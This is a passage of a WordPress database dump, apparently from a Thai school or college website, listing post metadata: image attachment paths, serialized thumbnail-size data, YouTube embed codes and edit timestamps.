(15423, 6541, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:42:\"2019/12/เลื่อนเวลา.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"เลื่อนเวลา-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"เลื่อนเวลา-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"เลื่อนเวลา-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"เลื่อนเวลา-400x267.png\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15443, 3485, '_oembed_fac5b2b9c18df9bdddfed0bf36ba39ee', '<iframe width=\"640\" height=\"480\" src=\"https://www.youtube.com/embed/a7qGKlOZTuc?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15444, 3485, '_oembed_time_fac5b2b9c18df9bdddfed0bf36ba39ee', '1580200183'),
(15445, 3485, '_oembed_7aa779165027035c2519f10d43244d3e', '<iframe width=\"640\" height=\"480\" src=\"https://www.youtube.com/embed/mRsG_Ypyppw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
(15446, 3485, '_oembed_time_7aa779165027035c2519f10d43244d3e', '1580200184'),
(15448, 6575, '_wp_attached_file', '2020/01/0.1บทคัดย่อ.jpg'),
(15449, 6575, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:39:\"2020/01/0.1บทคัดย่อ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"0.1บทคัดย่อ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"0.1บทคัดย่อ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"0.1บทคัดย่อ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"0.1บทคัดย่อ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"0.1บทคัดย่อ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15450, 6576, '_wp_attached_file', '2020/01/0.2Abstract.jpg'),
(15451, 6576, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:23:\"2020/01/0.2Abstract.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"0.2Abstract-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"0.2Abstract-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"0.2Abstract-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"0.2Abstract-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"0.2Abstract-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15452, 6577, '_wp_attached_file', '2020/01/1ปวช.jpg'),
(15453, 6577, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:22:\"2020/01/1ปวช.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"1ปวช-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"1ปวช-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"1ปวช-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"1ปวช-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"1ปวช-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15454, 6578, '_wp_attached_file', '2020/01/2ทลบ.jpg'),
(15455, 6578, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:22:\"2020/01/2ทลบ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"2ทลบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"2ทลบ-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"2ทลบ-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"2ทลบ-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"2ทลบ-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15456, 6579, '_wp_attached_file', '2020/01/3จัดนิทรรศการสื่อการเรียนการสอน.jpg'),
(15457, 6579, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:103:\"2020/01/3จัดนิทรรศการสื่อการเรียนการสอน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:103:\"3จัดนิทรรศการสื่อการเรียนการสอน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:103:\"3จัดนิทรรศการสื่อการเรียนการสอน-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:103:\"3จัดนิทรรศการสื่อการเรียนการสอน-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:104:\"3จัดนิทรรศการสื่อการเรียนการสอน-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:103:\"3จัดนิทรรศการสื่อการเรียนการสอน-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15458, 6580, '_wp_attached_file', '2020/01/Untitled-2.png'),
(15459, 6580, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/01/Untitled-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-2-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-2-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-2-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-2-400x133.png\";s:5:\"width\";i:400;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15460, 6581, '_wp_attached_file', '2020/01/Untitled-4.png'),
(15461, 6581, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/01/Untitled-4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-4-300x120.png\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-4-768x307.png\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-4-1024x410.png\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-4-400x160.png\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15468, 6590, '_edit_lock', '1580275666:14'),
(15469, 6590, '_edit_last', '14'),
(15470, 6591, '_wp_attached_file', '2020/01/290162-01.jpg'),
(15471, 6591, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15472, 6590, '_thumbnail_id', '6591'),
(15475, 6590, '_hide_featured', NULL),
(15478, 6593, '_edit_lock', '1580275718:14'),
(15479, 6593, '_edit_last', '14'),
(15480, 6594, '_wp_attached_file', '2020/01/290162-02.jpg'),
(15481, 6594, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15482, 6593, '_thumbnail_id', '6594'),
(15485, 6593, '_hide_featured', NULL),
(15489, 6597, '_wp_attached_file', '2020/01/290162-03.jpg'),
(15490, 6597, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15500, 6600, '_edit_lock', '1580276145:14'),
(15501, 6600, '_edit_last', '14'),
(15502, 6601, '_wp_attached_file', '2020/01/290162-04.jpg'),
(15503, 6601, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15504, 6600, '_thumbnail_id', '6601'),
(15507, 6600, '_hide_featured', NULL),
(15510, 6604, '_wp_attached_file', '2020/01/290162-05.jpg'),
(15511, 6604, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-05-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-05-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15521, 6607, '_wp_attached_file', '2020/01/290162-06.jpg'),
(15522, 6607, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/01/290162-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-06-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-06-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15532, 6610, '_wp_attached_file', '2020/01/290162-07.jpg'),
(15533, 6609, '_edit_lock', '1580276234:14'),
(15534, 6610, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15535, 6609, '_edit_last', '14'),
(15536, 6609, '_thumbnail_id', '6610'),
(15539, 6609, '_hide_featured', NULL),
(15542, 6612, '_edit_lock', '1580276317:14'),
(15543, 6613, '_wp_attached_file', '2020/01/290162-08.jpg'),
(15544, 6613, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/01/290162-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"290162-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"290162-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"290162-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"290162-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"290162-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(15545, 6612, '_edit_last', '14'),
(15546, 6612, '_thumbnail_id', '6613'),
(15549, 6612, '_hide_featured', NULL),
(15552, 6616, '_wp_attached_file', '2020/01/290162-09.jpg'),
